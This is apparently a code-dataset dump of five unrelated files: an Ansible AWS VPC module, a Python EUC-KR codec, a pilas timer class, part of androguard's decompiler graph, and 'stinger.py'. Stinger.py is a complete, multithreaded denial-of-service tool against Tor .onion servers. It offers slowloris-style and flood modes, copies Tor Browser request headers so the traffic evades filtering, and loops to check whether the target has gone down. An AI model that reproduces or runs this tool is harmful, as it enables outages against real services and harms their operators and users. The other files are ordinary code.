change = "true"
match.append(change)
if 'false' in match:
return False
else:
return True
def rtb_changed(route_tables=None, vpc_conn=None, module=None, vpc=None, igw=None):
"""
Checks if the remote routes match the local routes.
route_tables : Route_tables parameter in the module
vpc_conn : The VPC conection object
module : The module object
vpc : The vpc object for this route table
igw : The internet gateway object for this vpc
Returns:
        True when there is a difference between the provided routes and the remote routes, or when the subnet associations differ.
        False when both the routes and the subnet associations match.
"""
    # We add one for the main table
rtb_len = len(route_tables) + 1
remote_rtb_len = len(vpc_conn.get_all_route_tables(filters={'vpc_id': vpc.id}))
if remote_rtb_len != rtb_len:
return True
    for rt in route_tables:
        rt_id = None
        for sn in rt['subnets']:
            rsn = vpc_conn.get_all_subnets(filters={'cidr': sn, 'vpc_id': vpc.id})
            if len(rsn) != 1:
                module.fail_json(
                    msg='The subnet {0} to associate with route_table {1} ' \
                    'does not exist, aborting'.format(sn, rt)
                )
            nrt = vpc_conn.get_all_route_tables(filters={'vpc_id': vpc.id, 'association.subnet-id': rsn[0].id})
            if not nrt:
                return True
            else:
                nrt = nrt[0]
                if not rt_id:
                    rt_id = nrt.id
                    if not routes_match(rt['routes'], nrt, igw):
                        return True
                    continue
                else:
                    if rt_id == nrt.id:
                        continue
                    else:
                        return True
    return False
def create_vpc(module, vpc_conn):
"""
Creates a new or modifies an existing VPC.
module : AnsibleModule object
vpc_conn: authenticated VPCConnection connection object
Returns:
A dictionary with information
about the VPC and subnets that were launched
"""
id = module.params.get('vpc_id')
cidr_block = module.params.get('cidr_block')
instance_tenancy = module.params.get('instance_tenancy')
dns_support = module.params.get('dns_support')
dns_hostnames = module.params.get('dns_hostnames')
subnets = module.params.get('subnets')
internet_gateway = module.params.get('internet_gateway')
route_tables = module.params.get('route_tables')
vpc_spec_tags = module.params.get('resource_tags')
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
changed = False
# Check for existing VPC by cidr_block + tags or id
previous_vpc = find_vpc(module, vpc_conn, id, cidr_block)
if previous_vpc is not None:
changed = False
vpc = previous_vpc
else:
changed = True
try:
vpc = vpc_conn.create_vpc(cidr_block, instance_tenancy)
# wait here until the vpc is available
pending = True
wait_timeout = time.time() + wait_timeout
while wait and wait_timeout > time.time() and pending:
try:
pvpc = vpc_conn.get_all_vpcs(vpc.id)
if hasattr(pvpc, 'state'):
if pvpc.state == "available":
pending = False
elif hasattr(pvpc[0], 'state'):
if pvpc[0].state == "available":
pending = False
# sometimes vpc_conn.create_vpc() will return a vpc that can't be found yet by vpc_conn.get_all_vpcs()
# when that happens, just wait a bit longer and try again
except boto.exception.BotoServerError, e:
if e.error_code != 'InvalidVpcID.NotFound':
raise
if pending:
time.sleep(5)
if wait and wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg = "wait for vpc availability timeout on %s" % time.asctime())
except boto.exception.BotoServerError, e:
module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message))
# Done with base VPC, now change to attributes and features.
# Add resource tags
vpc_tags = dict((t.name, t.value) for t in vpc_conn.get_all_tags(filters={'resource-id': vpc.id}))
if not set(vpc_spec_tags.items()).issubset(set(vpc_tags.items())):
new_tags = {}
for (key, value) in set(vpc_spec_tags.items()):
if (key, value) not in set(vpc_tags.items()):
new_tags[key] = value
if new_tags:
vpc_conn.create_tags(vpc.id, new_tags)
# boto doesn't appear to have a way to determine the existing
# value of the dns attributes, so we just set them.
# It also must be done one at a time.
vpc_conn.modify_vpc_attribute(vpc.id, enable_dns_support=dns_support)
vpc_conn.modify_vpc_attribute(vpc.id, enable_dns_hostnames=dns_hostnames)
# Process all subnet properties
if subnets is not None:
if not isinstance(subnets, list):
module.fail_json(msg='subnets needs to be a list of cidr blocks')
current_subnets = vpc_conn.get_all_subnets(filters={ 'vpc_id': vpc.id })
# First add all new subnets
for subnet in subnets:
add_subnet = True
subnet_tags_current = True
new_subnet_tags = subnet.get('resource_tags', None)
subnet_tags_delete = []
for csn in current_subnets:
if subnet['cidr'] == csn.cidr_block:
add_subnet = False
# Check if AWS subnet tags are in playbook subnet tags
subnet_tags_extra = (set(csn.tags.items()).issubset(set(new_subnet_tags.items())))
# Check if subnet tags in playbook are in AWS subnet tags
subnet_tags_current = (set(new_subnet_tags.items()).issubset(set(csn.tags.items())))
if subnet_tags_extra is False:
try:
for item in csn.tags.items():
if item not in new_subnet_tags.items():
subnet_tags_delete.append(item)
subnet_tags_delete = [key[0] for key in subnet_tags_delete]
delete_subnet_tag = vpc_conn.delete_tags(csn.id, subnet_tags_delete)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete resource tag, error {0}'.format(e))
# Add new subnet tags if not current
subnet_tags_current = (set(new_subnet_tags.items()).issubset(set(csn.tags.items())))
if subnet_tags_current is not True:
try:
changed = True
create_subnet_tag = vpc_conn.create_tags(csn.id, new_subnet_tags)
except EC2ResponseError, e:
module.fail_json(msg='Unable to create resource tag, error: {0}'.format(e))
if add_subnet:
try:
new_subnet = vpc_conn.create_subnet(vpc.id, subnet['cidr'], subnet.get('az', None))
new_subnet_tags = subnet.get('resource_tags', None)
if new_subnet_tags:
# Sometimes AWS takes its time to create a subnet and so using new subnets's id
# to create tags results in exception.
# boto doesn't seem to refresh 'state' of the newly created subnet, i.e.: it's always 'pending'
# so i resorted to polling vpc_conn.get_all_subnets with the id of the newly added subnet
while len(vpc_conn.get_all_subnets(filters={ 'subnet-id': new_subnet.id })) == 0:
time.sleep(0.1)
vpc_conn.create_tags(new_subnet.id, new_subnet_tags)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to create subnet {0}, error: {1}'.format(subnet['cidr'], e))
# Now delete all absent subnets
for csubnet in current_subnets:
delete_subnet = True
for subnet in subnets:
if csubnet.cidr_block == subnet['cidr']:
delete_subnet = False
if delete_subnet:
try:
vpc_conn.delete_subnet(csubnet.id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete subnet {0}, error: {1}'.format(csubnet.cidr_block, e))
# Handle Internet gateway (create/delete igw)
igw = None
igw_id = None
igws = vpc_conn.get_all_internet_gateways(filters={'attachment.vpc-id': vpc.id})
if len(igws) > 1:
module.fail_json(msg='EC2 returned more than one Internet Gateway for id %s, aborting' % vpc.id)
if internet_gateway:
if len(igws) != 1:
try:
igw = vpc_conn.create_internet_gateway()
vpc_conn.attach_internet_gateway(igw.id, vpc.id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to create Internet Gateway, error: {0}'.format(e))
else:
# Set igw variable to the current igw instance for use in route tables.
igw = igws[0]
else:
if len(igws) > 0:
try:
vpc_conn.detach_internet_gateway(igws[0].id, vpc.id)
vpc_conn.delete_internet_gateway(igws[0].id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete Internet Gateway, error: {0}'.format(e))
if igw is not None:
igw_id = igw.id
# Handle route tables - this may be worth splitting into a
# different module but should work fine here. The strategy to stay
    # idempotent is to basically build all the route tables as
# defined, track the route table ids, and then run through the
# remote list of route tables and delete any that we didn't
# create. This shouldn't interrupt traffic in theory, but is the
# only way to really work with route tables over time that I can
# think of without using painful aws ids. Hopefully boto will add
# the replace-route-table API to make this smoother and
# allow control of the 'main' routing table.
if route_tables is not None:
rtb_needs_change = rtb_changed(route_tables, vpc_conn, module, vpc, igw)
if route_tables is not None and rtb_needs_change:
if not isinstance(route_tables, list):
module.fail_json(msg='route tables need to be a list of dictionaries')
# Work through each route table and update/create to match dictionary array
all_route_tables = []
for rt in route_tables:
try:
new_rt = vpc_conn.create_route_table(vpc.id)
new_rt_tags = rt.get('resource_tags', None)
if new_rt_tags:
vpc_conn.create_tags(new_rt.id, new_rt_tags)
for route in rt['routes']:
route_kwargs = {}
if route['gw'] == 'igw':
if not internet_gateway:
module.fail_json(
msg='You asked for an Internet Gateway ' \
'(igw) route, but you have no Internet Gateway'
)
route_kwargs['gateway_id'] = igw.id
elif route['gw'].startswith('i-'):
route_kwargs['instance_id'] = route['gw']
elif route['gw'].startswith('eni-'):
route_kwargs['interface_id'] = route['gw']
elif route['gw'].startswith('pcx-'):
route_kwargs['vpc_peering_connection_id'] = route['gw']
else:
route_kwargs['gateway_id'] = route['gw']
vpc_conn.create_route(new_rt.id, route['dest'], **route_kwargs)
# Associate with subnets
for sn in rt['subnets']:
rsn = vpc_conn.get_all_subnets(filters={'cidr': sn, 'vpc_id': vpc.id })
if len(rsn) != 1:
module.fail_json(
msg='The subnet {0} to associate with route_table {1} ' \
'does not exist, aborting'.format(sn, rt)
)
rsn = rsn[0]
# Disassociate then associate since we don't have replace
old_rt = vpc_conn.get_all_route_tables(
filters={'association.subnet_id': rsn.id, 'vpc_id': vpc.id}
)
old_rt = [ x for x in old_rt if x.id != None ]
if len(old_rt) == 1:
old_rt = old_rt[0]
association_id = None
for a in old_rt.associations:
if a.subnet_id == rsn.id:
association_id = a.id
vpc_conn.disassociate_route_table(association_id)
vpc_conn.associate_route_table(new_rt.id, rsn.id)
all_route_tables.append(new_rt)
changed = True
except EC2ResponseError, e:
module.fail_json(
msg='Unable to create and associate route table {0}, error: ' \
'{1}'.format(rt, e)
)
# Now that we are good to go on our new route tables, delete the
# old ones except the 'main' route table as boto can't set the main
# table yet.
all_rts = vpc_conn.get_all_route_tables(filters={'vpc-id': vpc.id})
for rt in all_rts:
if rt.id is None:
continue
delete_rt = True
for newrt in all_route_tables:
if newrt.id == rt.id:
delete_rt = False
break
if delete_rt:
rta = rt.associations
is_main = False
for a in rta:
if a.main:
is_main = True
break
try:
if not is_main:
vpc_conn.delete_route_table(rt.id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete old route table {0}, error: {1}'.format(rt.id, e))
vpc_dict = get_vpc_info(vpc)
created_vpc_id = vpc.id
returned_subnets = []
current_subnets = vpc_conn.get_all_subnets(filters={ 'vpc_id': vpc.id })
for sn in current_subnets:
returned_subnets.append({
'resource_tags': dict((t.name, t.value) for t in vpc_conn.get_all_tags(filters={'resource-id': sn.id})),
'cidr': sn.cidr_block,
'az': sn.availability_zone,
'id': sn.id,
})
if subnets is not None:
# Sort subnets by the order they were listed in the play
order = {}
for idx, val in enumerate(subnets):
order[val['cidr']] = idx
# Number of subnets in the play
subnets_in_play = len(subnets)
returned_subnets.sort(key=lambda x: order.get(x['cidr'], subnets_in_play))
return (vpc_dict, created_vpc_id, returned_subnets, igw_id, changed)
def terminate_vpc(module, vpc_conn, vpc_id=None, cidr=None):
"""
Terminates a VPC
module: Ansible module object
vpc_conn: authenticated VPCConnection connection object
vpc_id: a vpc id to terminate
cidr: The cidr block of the VPC - can be used in lieu of an ID
Returns a dictionary of VPC information
about the VPC terminated.
If the VPC to be terminated is available
"changed" will be set to True.
"""
vpc_dict = {}
terminated_vpc_id = ''
changed = False
vpc = find_vpc(module, vpc_conn, vpc_id, cidr)
if vpc is not None:
if vpc.state == 'available':
terminated_vpc_id=vpc.id
vpc_dict=get_vpc_info(vpc)
try:
subnets = vpc_conn.get_all_subnets(filters={'vpc_id': vpc.id})
for sn in subnets:
vpc_conn.delete_subnet(sn.id)
igws = vpc_conn.get_all_internet_gateways(
filters={'attachment.vpc-id': vpc.id}
)
for igw in igws:
vpc_conn.detach_internet_gateway(igw.id, vpc.id)
vpc_conn.delete_internet_gateway(igw.id)
rts = vpc_conn.get_all_route_tables(filters={'vpc_id': vpc.id})
for rt in rts:
rta = rt.associations
is_main = False
for a in rta:
if a.main:
is_main = True
if not is_main:
vpc_conn.delete_route_table(rt.id)
vpc_conn.delete_vpc(vpc.id)
except EC2ResponseError, e:
module.fail_json(
msg='Unable to delete VPC {0}, error: {1}'.format(vpc.id, e)
)
changed = True
vpc_dict['state'] = "terminated"
return (changed, vpc_dict, terminated_vpc_id)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
cidr_block = dict(),
instance_tenancy = dict(choices=['default', 'dedicated'], default='default'),
wait = dict(type='bool', default=False),
wait_timeout = dict(default=300),
dns_support = dict(type='bool', default=True),
dns_hostnames = dict(type='bool', default=True),
subnets = dict(type='list'),
vpc_id = dict(),
internet_gateway = dict(type='bool', default=False),
resource_tags = dict(type='dict', required=True),
route_tables = dict(type='list'),
state = dict(choices=['present', 'absent'], default='present'),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
state = module.params.get('state')
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module)
# If we have a region specified, connect to its endpoint.
if region:
try:
vpc_conn = boto.vpc.connect_to_region(
region,
**aws_connect_kwargs
)
except boto.exception.NoAuthHandlerFound, e:
module.fail_json(msg = str(e))
else:
module.fail_json(msg="region must be specified")
igw_id = None
if module.params.get('state') == 'absent':
vpc_id = module.params.get('vpc_id')
cidr = module.params.get('cidr_block')
(changed, vpc_dict, new_vpc_id) = terminate_vpc(module, vpc_conn, vpc_id, cidr)
subnets_changed = None
elif module.params.get('state') == 'present':
# Changed is always set to true when provisioning a new VPC
(vpc_dict, new_vpc_id, subnets_changed, igw_id, changed) = create_vpc(module, vpc_conn)
module.exit_json(changed=changed, vpc_id=new_vpc_id, vpc=vpc_dict, igw_id=igw_id, subnets=subnets_changed)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
main()
| gpl-3.0 | 5,779,987,011,829,108,000 | 38.716198 | 922 | 0.566334 | false |
vicky2135/lucious | lib/python2.7/encodings/euc_kr.py | 816 | 1027 | #
# euc_kr.py: Python Unicode Codec for EUC_KR
#
# Written by Hye-Shik Chang <[email protected]>
#
import _codecs_kr, codecs
import _multibytecodec as mbc
codec = _codecs_kr.getcodec('euc_kr')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='euc_kr',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
| bsd-3-clause | -839,817,443,611,323,800 | 25.333333 | 74 | 0.696203 | false |
whitepacket/Stinger-Tor | stinger.py | 1 | 6382 | #!/usr/bin/env python
#Stinger-Tor
#Function names are written in the order metasploit launches attacks: RECON - EXPLOIT - PAYLOAD - LOOT for entertainment purposes.
#Requires Socksipy (socks.py) in the current directory. Download it from here: https://raw.githubusercontent.com/mikedougherty/SocksiPy/master/socks.py
#I'm not responsible for any damages or consequences resulting from the use of this script, you are.
#For legal, research purposes only!
import os, socks, argparse, time, random, re, thread
parser = argparse.ArgumentParser(description='Tor server (.onion) unblockable DoS tool') #Basic CLI arguments.
parser.add_argument('-s', help="Host (.onion) to attack")
parser.add_argument('-p', default=80, help="Host port to flood (default: 80)")
parser.add_argument('-t', default=256, help="Attack threads (default: 256, max: 376)")
parser.add_argument('-tp', default=9050, help="Tor port on (default: 9050). Use 9150 when using the Tor Browser Bundle.")
parser.add_argument('-m', default='slow', help="Method. 1: slowget, 2: flood")
args = parser.parse_args()
if not args.s.lower().endswith(".onion"): #Only onion addresses accepted.
print "Error: server specified is not hosted under Tor."
exit(1)
elif not len(list(args.s.lower())) == 22:
print "Error: server specified is not hosted under Tor."
exit(1)
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", int(args.tp))
except e as Exception:
print "Error: Tor port is not an integer."
exit(1)
exploit = ("GET / HTTP/1.1\r\n"
"Host: %s\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-US,en;q=0.5\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Connection: keep-alive\r\n\r\n"
% (args.s)) #Exact replica of the HTTP request sent by the Tor Browser Bundle, filtering this request will be DoS in itself.
# update: you will want to change the user agent to the latest Tor Browser UA or just copy a full request using Live HTTP Headers or Wireshark so it stays identical.
def payload(s, exploit): #floods the open socket with GET requests till it closes (if ever), or opens as many sockets as possible and slowly sends the HTTP headers.
if args.m.lower().startswith("slow") or args.m.lower() == '1':
while 1:
for header in exploit:
s.send(header)
time.sleep(random.randrange(5,20))
else:
while 1:
s.send(exploit)
def recon(host, port, exploit):
while 1:
try:
s = socks.socksocket()
s.settimeout(30)
s.connect((host, port))
payload(s,exploit)
except:
pass
if int(args.tp) < 1: #Make sure all options were typed correctly...
print "Error: invalid tor port."
exit(1)
elif int(args.tp) > 65535:
print "Error: tor port too large."
exit(1)
elif int(args.p) < 1:
print "Error: invalid server port."
exit(1)
elif int(args.t) < 1:
print "Error: too little threads."
exit(1)
elif int(args.t) > 376:
print "Error: too many threads. maximum is 376."
exit(1)
elif int(args.p) > 65535:
print "Error: server port too large."
exit(1)
method = "SlowGET" #Below is basically a summary of the user-specified settings and what's taking place.
if not args.m.lower().startswith('slow') and not args.m == "1":
method = "Flooder"
print '*********************************'
print '* [stinger] *'
print '* initiating stress test.. *'
print '* -stress test details- *'
print '* host: '+args.s+' *'
nex = '* server port: '+str(args.p)
for x in range(0,15 - len(list(str(args.p))) + 1):
nex += " "
nex += "*"
print nex
nex = '* tor port: '+str(args.tp)
for x in range(0,18 - len(list(str(args.tp))) + 1):
nex += " "
nex += "*"
print nex
print '* DoS ETA: 1 minute *'
print '* method: '+method+' *'
nex = '* threads: '+str(args.t)
if int(args.t) > 99:
for x in range(0,17):
nex += " "
elif int(args.t) < 100 and int(args.t) > 9:
for x in range(0,18):
nex += " "
else:
for x in range(0,19):
nex += " "
nex += "*"
print nex
print '*********************************'
time.sleep(3)
print 'starting threads...'
time.sleep(3)
for x in range(0,int(args.t)):
try:
thread.start_new_thread(recon, (args.s, int(args.p), exploit))
print 'Thread: '+str(x+1)+' started.'
except:
print "Error: maximum threads reached. attack will still continue."
break
print 'threads started.'
time.sleep(2)
print "initiating server status checker." #Here we repeatedly check the server status in order to know weather or not our DoS is succeeding.
while 1: #it might be a good idea to develop something to escape this loop, so we don't need to kill the Python process.
try:
s = socks.socksocket()
s.settimeout(30)
s.connect((args.s, int(args.p)))
s.send(exploit)
r = s.recv(256)
s.close() #it might be a good idea to use more specified error messages to avoid false positives, however, this is sufficient most of the time.
if 'network read timeout' in r.lower() or 'network connect timeout' in r.lower() or 'origin connection time-out' in r.lower() or 'unknown error' in r.lower() or 'bandwidth limit exceeded' in r.lower() or 'gateway timeout' in r.lower() or 'service unavaliable' in r.lower() or 'bad gateway' in r.lower() or 'internal server error' in r.lower() or 'no response' in r.lower() or 'too many requests' in r.lower() or 'request timeout' in r.lower():
#detects when the server software is under denial of service, but the server is still responsive.
#598 Network read timeout - 599 Network connect timeout - 522 Origin Connection Time-out - 520 Unknown Error - 509 Bandwidth Limit - 504 Gateway Timeout - 503 Service Unavaliable - 502 Bad Gateway - 500 Internal Server Error - 444 No Response - 429 Too Many Requests - 408 Request Timeout
print 'Server offline: returning error responses.'
else:
print 'Server is online.'
except:
print 'Server offline: unable to connect to TCP port, or receive HTTP response.'
| mpl-2.0 | 8,237,489,491,691,621,000 | 43.943662 | 451 | 0.639611 | false |
DrDub/pilas | pilas/actores/temporizador.py | 5 | 2558 | # -*- encoding: utf-8 -*-
# For Pilas engine - A video game framework.
#
# Copyright 2010 - Pablo Garrido
# License: LGPLv3 (see http://www.gnu.org/licenses/lgpl.html)
#
# Website - http://www.pilas-engine.com.ar
#
import pilas
from pilas.actores import Texto
from pilas import colores
class Temporizador(Texto):
"""Representa un contador de tiempo con cuenta regresiva.
Por ejemplo:
>>> t = pilas.actores.Temporizador()
>>> def hola_mundo():
... pilas.avisar("Hola mundo, pasaron 10 segundos...")
...
>>> t.ajustar(10, hola_mundo)
>>> t.iniciar()
"""
def __init__(self, x=0, y=0, color=colores.negro, fuente=None,
autoeliminar=False):
"""Inicializa el temporizador.
:param x: Posiciรณn horizontal.
:param y: Posiciรณn vertical.
:param color: El color que tendrรก el texto.
:param autoeliminar: Indica si se desea eliminar el Temporizador
cuando acabe.
"""
Texto.__init__(self, '0', x=x, y=y, fuente=fuente)
self.ajustar(1, self.funcion_vacia)
self.color = color
self.autoeliminar = autoeliminar
    # function used when no callback has been set on the timer
def funcion_vacia(self):
pass
def definir_tiempo_texto(self, variable):
"""Define el texto a mostrar en el temporizador.
:param variable: La cadena de texto a mostrar.
"""
self.texto = str(variable)
    # ajustar is used to set both the time and the function
    # we want to execute
def ajustar(self, tiempo=1, funcion=None):
"""Indica una funcion para ser invocada en el tiempo indicado.
La funciรณn no tiene que recibir parรกmetros, y luego de
ser indicada se tiene que iniciar el temporizador.
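        For example (the `temporizador` instance below is illustrative):
            >>> def avisar_fin():
            ...     pilas.avisar("Time is up!")
            ...
            >>> temporizador.ajustar(5, avisar_fin)
            >>> temporizador.iniciar()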
"""
self.tiempo = tiempo
self.definir_tiempo_texto(self.tiempo)
if funcion == None:
self.funcion = self.funcion_vacia()
else:
self.funcion = funcion
def _restar_a_contador(self):
if self.tiempo != 0:
self.tiempo -= 1
self.definir_tiempo_texto(self.tiempo)
return True
def autoeliminar_al_terminar(self):
self.funcion()
if self.autoeliminar:
self.eliminar()
def iniciar(self):
"""Inicia el contador de tiempo con la funciรณn indicada."""
pilas.mundo.agregar_tarea_una_vez(self.tiempo, self.autoeliminar_al_terminar)
pilas.mundo.agregar_tarea_siempre(1, self._restar_a_contador)
| lgpl-3.0 | -2,760,788,048,209,795,600 | 29.380952 | 85 | 0.613245 | false |
dandycheung/androguard | androguard/decompiler/dad/graph.py | 34 | 17082 | # This file is part of Androguard.
#
# Copyright (c) 2012 Geoffroy Gueguen <[email protected]>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from collections import defaultdict
from androguard.decompiler.dad.basic_blocks import (build_node_from_block,
StatementBlock, CondBlock)
from androguard.decompiler.dad.instruction import Variable
logger = logging.getLogger('dad.graph')
class Graph():
def __init__(self):
self.entry = None
self.exit = None
self.nodes = list()
self.rpo = []
self.edges = defaultdict(list)
self.catch_edges = defaultdict(list)
self.reverse_edges = defaultdict(list)
self.reverse_catch_edges = defaultdict(list)
self.loc_to_ins = None
self.loc_to_node = None
def sucs(self, node):
return self.edges.get(node, [])
def all_sucs(self, node):
return self.edges.get(node, []) + self.catch_edges.get(node, [])
def preds(self, node):
return [n for n in self.reverse_edges.get(node, [])
if not n.in_catch]
def all_preds(self, node):
return (self.reverse_edges.get(node, []) +
self.reverse_catch_edges.get(node, []))
def add_node(self, node):
self.nodes.append(node)
def add_edge(self, e1, e2):
lsucs = self.edges[e1]
if e2 not in lsucs:
lsucs.append(e2)
lpreds = self.reverse_edges[e2]
if e1 not in lpreds:
lpreds.append(e1)
def add_catch_edge(self, e1, e2):
lsucs = self.catch_edges[e1]
if e2 not in lsucs:
lsucs.append(e2)
lpreds = self.reverse_catch_edges[e2]
if e1 not in lpreds:
lpreds.append(e1)
def remove_node(self, node):
preds = self.reverse_edges.pop(node, [])
for pred in preds:
self.edges[pred].remove(node)
succs = self.edges.pop(node, [])
for suc in succs:
self.reverse_edges[suc].remove(node)
exc_preds = self.reverse_catch_edges.pop(node, [])
for pred in exc_preds:
self.catch_edges[pred].remove(node)
exc_succs = self.catch_edges.pop(node, [])
for suc in exc_succs:
self.reverse_catch_edges[suc].remove(node)
self.nodes.remove(node)
if node in self.rpo:
self.rpo.remove(node)
del node
def number_ins(self):
self.loc_to_ins = {}
self.loc_to_node = {}
num = 0
for node in self.rpo:
start_node = num
num = node.number_ins(num)
end_node = num - 1
self.loc_to_ins.update(node.get_loc_with_ins())
self.loc_to_node[(start_node, end_node)] = node
def get_ins_from_loc(self, loc):
return self.loc_to_ins.get(loc)
def get_node_from_loc(self, loc):
for (start, end), node in self.loc_to_node.iteritems():
if start <= loc <= end:
return node
def remove_ins(self, loc):
ins = self.get_ins_from_loc(loc)
self.get_node_from_loc(loc).remove_ins(loc, ins)
self.loc_to_ins.pop(loc)
def split_if_nodes(self):
'''
        Split IfNodes into two nodes: the first node is the header node, the
second one is only composed of the jump condition.
'''
node_map = {n: n for n in self.nodes}
to_update = set()
for node in self.nodes[:]:
if node.type.is_cond:
if len(node.get_ins()) > 1:
pre_ins = node.get_ins()[:-1]
last_ins = node.get_ins()[-1]
pre_node = StatementBlock('%s-pre' % node.name, pre_ins)
cond_node = CondBlock('%s-cond' % node.name, [last_ins])
node_map[node] = pre_node
node_map[pre_node] = pre_node
node_map[cond_node] = cond_node
pre_node.copy_from(node)
cond_node.copy_from(node)
for var in node.var_to_declare:
pre_node.add_variable_declaration(var)
pre_node.type.is_stmt = True
cond_node.true = node.true
cond_node.false = node.false
for pred in self.all_preds(node):
pred_node = node_map[pred]
# Verify that the link is not an exception link
if node not in self.sucs(pred):
self.add_catch_edge(pred_node, pre_node)
continue
if pred is node:
pred_node = cond_node
if pred.type.is_cond: # and not (pred is node):
if pred.true is node:
pred_node.true = pre_node
if pred.false is node:
pred_node.false = pre_node
self.add_edge(pred_node, pre_node)
for suc in self.sucs(node):
self.add_edge(cond_node, node_map[suc])
# We link all the exceptions to the pre node instead of the
# condition node, which should not trigger any of them.
for suc in self.catch_edges.get(node, []):
self.add_catch_edge(pre_node, node_map[suc])
if node is self.entry:
self.entry = pre_node
self.add_node(pre_node)
self.add_node(cond_node)
self.add_edge(pre_node, cond_node)
pre_node.update_attribute_with(node_map)
cond_node.update_attribute_with(node_map)
self.remove_node(node)
else:
to_update.add(node)
for node in to_update:
node.update_attribute_with(node_map)
def simplify(self):
'''
Simplify the CFG by merging/deleting statement nodes when possible:
If statement B follows statement A and if B has no other predecessor
besides A, then we can merge A and B into a new statement node.
We also remove nodes which do nothing except redirecting the control
flow (nodes which only contains a goto).
'''
redo = True
while redo:
redo = False
node_map = {}
to_update = set()
for node in self.nodes[:]:
if node.type.is_stmt and node in self.nodes:
sucs = self.all_sucs(node)
if len(sucs) != 1:
continue
suc = sucs[0]
if len(node.get_ins()) == 0:
if any(pred.type.is_switch
for pred in self.all_preds(node)):
continue
if node is suc:
continue
node_map[node] = suc
for pred in self.all_preds(node):
pred.update_attribute_with(node_map)
if node not in self.sucs(pred):
self.add_catch_edge(pred, suc)
continue
self.add_edge(pred, suc)
redo = True
if node is self.entry:
self.entry = suc
self.remove_node(node)
elif (suc.type.is_stmt and
len(self.all_preds(suc)) == 1 and
not (suc in self.catch_edges) and
not ((node is suc) or (suc is self.entry))):
ins_to_merge = suc.get_ins()
node.add_ins(ins_to_merge)
for var in suc.var_to_declare:
node.add_variable_declaration(var)
new_suc = self.sucs(suc)[0]
if new_suc:
self.add_edge(node, new_suc)
for exception_suc in self.catch_edges.get(suc, []):
self.add_catch_edge(node, exception_suc)
redo = True
self.remove_node(suc)
else:
to_update.add(node)
for node in to_update:
node.update_attribute_with(node_map)
def compute_rpo(self):
'''
Number the nodes in reverse post order.
        An RPO traversal visits as many predecessors of a node as possible
before visiting the node itself.
'''
nb = len(self.nodes) + 1
for node in self.post_order():
node.num = nb - node.po
self.rpo = sorted(self.nodes, key=lambda n: n.num)
def post_order(self):
'''
        Return the nodes of the graph in post-order, i.e. we visit all the
children of a node before visiting the node itself.
'''
def _visit(n, cnt):
visited.add(n)
for suc in self.all_sucs(n):
if not suc in visited:
for cnt, s in _visit(suc, cnt):
yield cnt, s
n.po = cnt
yield cnt + 1, n
visited = set()
for _, node in _visit(self.entry, 1):
yield node
def draw(self, name, dname, draw_branches=True):
from pydot import Dot, Edge
g = Dot()
g.set_node_defaults(color='lightgray', style='filled', shape='box',
fontname='Courier', fontsize='10')
for node in sorted(self.nodes, key=lambda x: x.num):
if draw_branches and node.type.is_cond:
g.add_edge(Edge(str(node), str(node.true), color='green'))
g.add_edge(Edge(str(node), str(node.false), color='red'))
else:
for suc in self.sucs(node):
g.add_edge(Edge(str(node), str(suc), color='blue'))
for except_node in self.catch_edges.get(node, []):
g.add_edge(Edge(str(node), str(except_node),
color='black', style='dashed'))
g.write_png('%s/%s.png' % (dname, name))
def immediate_dominators(self):
return dom_lt(self)
def __len__(self):
return len(self.nodes)
def __repr__(self):
return str(self.nodes)
def __iter__(self):
for node in self.nodes:
yield node
def dom_lt(graph):
    '''Dominator algorithm from Lengauer-Tarjan'''
def _dfs(v, n):
semi[v] = n = n + 1
vertex[n] = label[v] = v
ancestor[v] = 0
for w in graph.all_sucs(v):
if not semi[w]:
parent[w] = v
n = _dfs(w, n)
pred[w].add(v)
return n
def _compress(v):
u = ancestor[v]
if ancestor[u]:
_compress(u)
if semi[label[u]] < semi[label[v]]:
label[v] = label[u]
ancestor[v] = ancestor[u]
def _eval(v):
if ancestor[v]:
_compress(v)
return label[v]
return v
def _link(v, w):
ancestor[w] = v
parent, ancestor, vertex = {}, {}, {}
label, dom = {}, {}
pred, bucket = defaultdict(set), defaultdict(set)
# Step 1:
semi = {v: 0 for v in graph.nodes}
n = _dfs(graph.entry, 0)
for i in xrange(n, 1, -1):
w = vertex[i]
# Step 2:
for v in pred[w]:
u = _eval(v)
y = semi[w] = min(semi[w], semi[u])
bucket[vertex[y]].add(w)
pw = parent[w]
